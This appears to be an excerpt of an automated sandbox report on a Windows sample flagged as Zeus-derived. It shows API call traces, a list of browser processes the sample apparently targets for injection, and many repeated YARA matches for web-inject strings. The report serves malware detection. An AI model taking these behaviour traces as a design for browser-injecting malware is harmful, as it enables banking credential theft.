    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex9_2_02BD3610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex9_2_02BD3610
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB95B0 CreateDesktopA,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,CloseHandle,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,2_2_02BB95B0

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 2.3.svchost.exe.2c70000.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.10.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.883000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.889000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 20.2.tGYLgZxMWmmBTD.exe.2172000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.39.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 22.2.tGYLgZxMWmmBTD.exe.1280000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.38.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 26.2.tGYLgZxMWmmBTD.exe.12e2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 39.2.tGYLgZxMWmmBTD.exe.cb2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 24.2.tGYLgZxMWmmBTD.exe.a30000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.50.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 20.2.tGYLgZxMWmmBTD.exe.2560000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 6.2.tGYLgZxMWmmBTD.exe.880000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 17.2.tGYLgZxMWmmBTD.exe.e70000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.8.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.2a02000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 22.2.tGYLgZxMWmmBTD.exe.1222000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 34.2.tGYLgZxMWmmBTD.exe.2742000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.53.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 13.2.tGYLgZxMWmmBTD.exe.d72000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.49.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.52.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 29.2.tGYLgZxMWmmBTD.exe.a42000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.888400.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.42.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 39.2.tGYLgZxMWmmBTD.exe.28f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 29.2.tGYLgZxMWmmBTD.exe.a42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 24.2.tGYLgZxMWmmBTD.exe.a30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 39.2.tGYLgZxMWmmBTD.exe.cb2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.49.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 20.2.tGYLgZxMWmmBTD.exe.2560000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.arxtPs1STE.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.888400.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.17.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.2bb0000.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.53.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 13.2.tGYLgZxMWmmBTD.exe.dd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.37.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.26.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.35.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.44.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.48.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.407000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 5.2.tGYLgZxMWmmBTD.exe.872000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.33.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 26.2.tGYLgZxMWmmBTD.exe.12e2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.3.arxtPs1STE.exe.780618.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.28.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.44.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 9.2.tGYLgZxMWmmBTD.exe.27c2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2ab0000.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.36.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 9.2.tGYLgZxMWmmBTD.exe.27c2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 5.2.tGYLgZxMWmmBTD.exe.8d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.4190000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.40.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 31.2.tGYLgZxMWmmBTD.exe.2d60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.46.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 31.2.tGYLgZxMWmmBTD.exe.29b2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.43.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.45.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.2a02000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 24.2.tGYLgZxMWmmBTD.exe.9d2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.11.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.29.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.38.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.883000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.2bb0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.arxtPs1STE.exe.406400.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 17.2.tGYLgZxMWmmBTD.exe.e12000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 20.2.tGYLgZxMWmmBTD.exe.2172000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.12.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 26.2.tGYLgZxMWmmBTD.exe.1340000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.407000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 6.2.tGYLgZxMWmmBTD.exe.822000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 13.2.tGYLgZxMWmmBTD.exe.d72000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 31.2.tGYLgZxMWmmBTD.exe.29b2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 26.2.tGYLgZxMWmmBTD.exe.1340000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.24.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 34.2.tGYLgZxMWmmBTD.exe.2742000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.3f90000.18.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.7.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 13.2.tGYLgZxMWmmBTD.exe.dd0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 22.2.tGYLgZxMWmmBTD.exe.1222000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.883000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.arxtPs1STE.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.16.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 22.2.tGYLgZxMWmmBTD.exe.1280000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 24.2.tGYLgZxMWmmBTD.exe.9d2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.4190000.9.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.47.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.31.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.13.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.30.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.19.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.2a56c00.4.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.2c13c00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 9.2.tGYLgZxMWmmBTD.exe.2bd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.14.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.22.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.51.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.2c13c00.5.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 29.2.tGYLgZxMWmmBTD.exe.aa0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.32.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 17.2.tGYLgZxMWmmBTD.exe.e12000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.883000.4.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 34.2.tGYLgZxMWmmBTD.exe.2a20000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.21.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 5.2.tGYLgZxMWmmBTD.exe.872000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.41.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.40.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.2a56c00.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.888400.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 34.2.tGYLgZxMWmmBTD.exe.2a20000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.50.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.45.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.23.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 6.2.tGYLgZxMWmmBTD.exe.822000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.41.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.arxtPs1STE.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 29.2.tGYLgZxMWmmBTD.exe.aa0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.20.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
